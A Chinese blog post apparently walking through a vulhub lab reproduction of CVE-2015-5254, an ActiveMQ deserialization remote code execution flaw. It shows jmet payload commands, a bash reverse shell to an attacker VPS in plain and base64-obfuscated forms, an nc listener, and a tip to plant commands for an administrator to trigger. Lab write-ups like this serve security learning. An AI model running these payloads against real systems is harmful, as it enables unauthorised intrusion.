vulhub-activemq(CVE-2015-5254)

最新推荐文章于 2024-08-30 22:57:20 发布
最新推荐文章于 2024-08-30 22:57:20 发布
阅读量482 收藏 4
点赞数 5
文章标签: activemq
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60894143/article/details/140232498
版权

Apache ActiveMQ 5.13.0版本之前到5.x版本的安全漏洞,该程序引起的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象,利用该漏洞执行任意代码。

Apache ActiveMQ 5.x ~ Apache ActiveMQ 5.13.0

利用限制

1.版本符合
2.立即执行代码:能够通过弱密码登录查看消息队列
3.没有查看队列所有消息的用户名和密码下,只能管理员/用户去点击我们插入的消息才能触发(比较鸡肋,但可以写入创建用户命令等待管理员点击查看,概率很大!)

jdk版本8

17不能使用

192.168.62.131     #靶机

192.168.62.142     #攻击机

192.168.62.143     #vps

#进入vulhub漏洞环境目录

cd /opt/vulhub-master/activemq/CVE-2015-5254/

#启用漏洞环境

docker-compose up -d

访问对应端口

admin/admin

可以看到ActiveMQ版本是5.11.1,属于ActiveMQ 反序列化漏洞 (CVE-2015-5254)的影响版本范围。

复现

发现目标开放的61616端口上承载apachemq ActiveMQ服务。

#下载jmetjar

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

执行命令,将有效负载发送到目标IP61616端口。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.62.131 61616

【命令解释】:调用java -jar 运行 jmet的jar包,-Q是插入一个名为event的队列,-I 是选择装载ActiveMQ模块 ,-s 是选择ysoserial payload ,-Y 是攻击模式和内容, -Yp 是选择攻击利用链,这是选择是ROME, 之后带上IP加端口。

-Q 比如我修改event为hack 就成为插入一个名为hack的队列。

这时,会给目标ActiveMQ添加一个event列,我们可以通过http://192.200.30.72:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息

点击event触发

登录ActiveMQ容器环境,查看命令已经执行成功,/tmp/sucess文件已成功创建

反弹shell,反弹到vps

#bash反弹命令

bash -i >& /dev/tcp/192.168.62.143/31005 0>&1   #143是vps

#bash64解码

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMjAwLjMwLjE2Ni8zMTAwNSAwPiYx}|{base64,-d}|{bash,-i}

-c前面是空格

#vps上开启端口监听

nc -lvvp 31005

攻击机执行shell命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYyLjE0My8zMTAwNSAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.62.131 61616

记住ID号

点击

查看vsp

C9ccc00
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
01 - vulhub - ActiveMq - CVE-2015-5254
易编橙 · 终身成长社群,相遇已是上上签!
09-18 633
该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行恶意的代码。
ActiveMQ 反序列化漏洞(CVE-2015-5254)特征分析
xhscxj的博客
11-24 925
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
vulhub-activemq-CVE-2015-5254
weixin_43585088的博客
04-17 537
vulhub-activemq-CVE-2015-5254 ActiveMQ Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件 默认端口:8161 vulhub起容器 搭建的时候出了点问题,查了一下可能是net模式的dns有问题,sudo vim /etc/resolv.conf 去添加一些nameserver ERROR: Get https://registry-1.docker.io/v2/: dial tcp: lookup registry-1.docker.i
vulhubactivemqCVE-2015-5254漏洞复现
yougexiaojiuguan的博客
11-24 525
学习过程中复现的漏洞,方便自己以后查看
02 - vulhub - ActiveMQ任意文件写入漏洞 - CVE-2016-3088 复现
易编橙 · 终身成长社群,相遇已是上上签!
09-22 774
该漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。
vulhub漏洞复现】CVE-2015-5254 ActiveMQ反序列化漏洞
RexHa的博客
02-26 1956
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
vulhub-activemq-cve-2015-5254
Ronin_qianmo的博客
07-27 167
1、漏洞描述 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 CVE-2017-7504漏洞与CVE-2015-7501的漏洞如出一辙,只是利用的路径稍微出现了变化,CVE-2017-7504出现在/j
vulhub-activemq(CVE-2016-3088)
m0_60894143的博客
07-07 402
在 Apache ActiveMQ 5.12.x~5.13.x 版本中,默认关闭了 fileserver 这个应用(不过,可以在conf/jetty.xml 中开启);该漏洞出现在 fileserver 应用中,漏洞原理是 fileserver 支持写入文件(但不解析 jsp),同时支持移动文件(MOVE 请求)。2、获取用户名和密码,可以通过弱口令、暴力破解、社工等方法(不过题目已经给出了默认用户名和密码 admin/admin,这里就省去了这个步骤)下也是可以的,我这边移动到。方法二:ssh上传公钥。
vulhub-activemq-CVE-2016-3088复现
qq_42728977的博客
12-08 663
这里写目录标题漏洞编号:CVE-2016-3088影响版本:Apache ActiveMQ 5.x~5.14.0漏洞产生原因:复现 :思考:参考 漏洞编号:CVE-2016-3088 影响版本:Apache ActiveMQ 5.x~5.14.0 https://www.cvedetails.com/cve/CVE-2016-3088/ 漏洞产生原因: ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件
vulhub靶场练习 CVE-2016-3088 —— ActiveMQ任意文件写入漏洞
雷根瓦尔德
11-08 1808
Vulhub靶场已经搭建完成,可以正式进行渗透测试的练习了。 本篇的内容是完成ActiveMQ任意文件写入漏洞(CVE-2016-3088) ActiveMQ介绍:Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 本篇我就先进行一次完整的实验过程,然后再按照...
CVE-2015-5254(ActiveMQ反序列化漏洞复现)
Sea_Sand息禅
07-13 2909
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者...
【漏洞复现】ActiveMQ反序列化漏洞(CVE-2015-5254)
晚风不及你
01-05 616
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
ActiveMQ CVE-2016-3088 分析
示例和笔记
06-07 1849
ActiveMQ是一种流行的开源消息队列软件,支持多种通信协议,并且广泛应用于企业级应用中。其版本1.0到5.14.0存在一个任意文件写入漏洞(CVE-2016-3088),攻击者可以利用该漏洞向ActiveMQ服务器上的任意位置写入恶意文件,从而导致服务器被入侵控制。ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。
第十二章节 xxjob, seata, zk, minio,activeMQ进行 helm化
lixiemang8887的博客
08-30 575
要将你提供的 Docker 命令转换为 Helm Chart,你需要将相关的配置转化为 Kubernetes 资源文件,并使用 Helm 的模板语法进行参数化配置。以下是一个基本的 Helm Chart 示例,包括DeploymentService和文件。
基于微信小程序校园订餐的+ssm演示+源代码+开题报告+演示视频.zip
09-04
人民生活水平的提高就会造成生活节奏越来越快,很多人吃饭都采用点外卖的方式。现在点外卖的平台已有很多,大多都需要安装它们的APP才可以使用,并且没有针对校园。如果一味的使用外卖平台不仅会造成商家成本的增加,还不利于商家校园订单的配送。开发基于微信小程序的校园订餐系统可以解决这些问题,实现借助微信就可以点餐。 本基于微信小程序校园订餐系统采用Java语言和Mysql数据库进行设计,技术采用微信小程序,可以不安装App软件就实现订餐。本系统实现管理员和用户、商家三个角色的功能。用户主要在微信端操作,内容有美食信息、网站公告信息、用户可以在线充值进行美食的订餐以及管理购物车和咨询客服。商家可以发布美食和管理订单。管理员可以发布公告和审核美食以及管理订单等。本系统可以实现校园的订餐,帮助商家更好的销售餐品。 关键词:在线订餐;美食信息管理;订单管理;Java语言
java项目实战练习.zip
最新发布
09-04
java项目实战练习.zip
Java项目-基于微信小程序的基于校园作业反馈的家校联系微信小程序(包括源码,数据库,教程).zip
09-04
Java毕设,小程序毕业设计,小程序课程设计,含有代码注释,新手也可看懂。毕业设计、期末大作业、课程设计、高分必看,下载下来,简单部署,就可以使用。 包含:项目源码、数据库脚本、软件工具等,该项目可以作为毕设、课程设计使用,前后端代码都在里面。 该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。 项目都经过严格调试,确保可以运行!可以放心下载 1. 技术组成 前端: 小程序 后台框架:SSM/SpringBoot(如果有的话) 开发环境:idea,微信开发者工具 数据库:MySql(建议用 5.7 版本,8.0 有时候会有坑) 数据库可视化工具:使用 Navicat 部署环境:Tomcat(建议用 7.x 或者 8.x 版本),maven
java抗疫物质管理系统设计和实现论文.docx
09-04
java抗疫物质管理系统设计和实现论文
C++的Apache-C-ActiveMQ
07-13
很抱歉给你带来混淆,Apache ActiveMQ C++ 客户端库(Apache-C-ActiveMQ)目前并不是 Apache 官方提供的。Apache ActiveMQ 主要支持 Java 语言,提供了 Java 的客户端库供使用。 如果你想在 C++ 中使用 ActiveMQ,可以考虑使用其他的消息中间件库,例如 RabbitMQ、ZeroMQ 或者 Nanomsg 等,它们都有 C++ 的客户端库可供使用。你可以根据自己的需求选择合适的消息中间件库,并在其官方网站上查找相关的 C++ 客户端库和文档。 非常抱歉给你带来困扰,如果有其他问题,我会尽力为你解答。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C9ccc00

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值